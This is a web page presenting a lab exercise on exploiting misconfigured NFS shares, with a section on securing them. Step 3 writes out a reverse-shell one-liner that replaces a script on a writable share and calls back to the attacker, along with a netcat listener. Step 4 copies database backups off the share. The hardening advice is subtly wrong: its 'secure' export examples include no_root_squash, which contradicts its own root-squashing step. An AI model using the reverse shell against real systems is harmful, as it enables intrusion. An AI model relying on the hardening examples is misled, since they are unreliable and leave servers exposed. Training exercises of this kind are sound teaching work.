Logo Light

Network

Web Apps

System

Cloud

Cryptography

IoT

Exercise 23: Exploiting Insecurely Configured NFS Shares

by | Apr 27, 2025 | 0 comments

Objective: Exploit weak or misconfigured Network File System (NFS) shares to access sensitive data, and learn how to secure NFS configurations to prevent such vulnerabilities.

Scenario: NFS is used to share file systems across networks. Misconfigured NFS shares can allow unauthorized access or modification of files. Your task is to identify and exploit such shares, and implement best practices to secure them.

Lab Setup

  1. Environment:
    • A Linux system with NFS shares configured.
  2. Tools Required:
    • showmount or nmap to discover NFS shares.
    • Access to the mount command.

Lab Steps

Step 1: Identify NFS Shares

  1. List available NFS shares on the target system using showmount: showmount -e <target_ip>
    • Example output: Export list for <target_ip>: /shared *(rw,sync) /backups 192.168.1.0/24(ro,sync)
  2. Use nmap to scan for NFS services: nmap -p 2049 --script=nfs-ls,nfs-showmount <target_ip>
    • This identifies exported directories and their permissions.

Step 2: Mount the NFS Share

  1. Mount a writable NFS share to your local system: sudo mount -t nfs <target_ip>:/shared /mnt
    • Replace <target_ip> with the server’s IP address.
    • Verify the mount: ls /mnt
  2. If the share is read-only, attempt to access sensitive files: cat /mnt/config.cfg

Step 3: Exploit Writable NFS Shares

  1. Create a malicious file on the writable share: echo 'This is a test file.' > /mnt/malicious.txt
    • Verify the file is saved: ls -l /mnt
  2. If the NFS share is used for script execution, replace an existing script with malicious content: echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' > /mnt/script.sh chmod +x /mnt/script.sh
  3. Set up a listener on your machine: nc -lvnp 4444
    • Wait for the target to execute the malicious script and establish a connection.

Step 4: Analyze and Gather Data

  1. Explore the NFS share for sensitive files, such as backups or configuration files: find /mnt -type f
  2. Copy any interesting files for further analysis: cp /mnt/backups/db_backup.sql .

Solution

Explanation:

  • NFS shares allow users to access remote file systems. Misconfigured permissions can enable unauthorized read/write access.
  • Writable shares can be exploited to introduce malicious files or scripts.

Prevention:

  1. Restrict Access:
    • Limit access to specific IP addresses or subnets in /etc/exports: /shared 192.168.1.0/24(rw,sync,no_root_squash)
  2. Use Secure Mount Options:
    • Configure shares with the following options:
      • noexec: Prevent execution of binaries.
      • nosuid: Ignore set-user-ID and set-group-ID bits.
      • nodev: Disallow device files.
      • Example: /shared 192.168.1.0/24(rw,sync,no_root_squash,noexec,nosuid,nodev)
  3. Enable Root Squashing:
    • Convert root access to a non-privileged user: /shared *(rw,sync,root_squash)
  4. Monitor and Log Access:
    • Use tools like auditd to log NFS access: sudo auditctl -w /shared -p rwxa -k nfs_access

Testing and Verification

  1. Attempt to mount and access NFS shares from an unauthorized IP to verify restrictions.
  2. Test that writable shares cannot execute malicious files.
  3. Ensure sensitive files are inaccessible without proper permissions.

Reflection

This exercise highlights the risks of misconfigured NFS shares and demonstrates how to exploit and secure them. By completing this lab, you’ve gained insights into protecting network file systems from unauthorized access and exploitation.

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *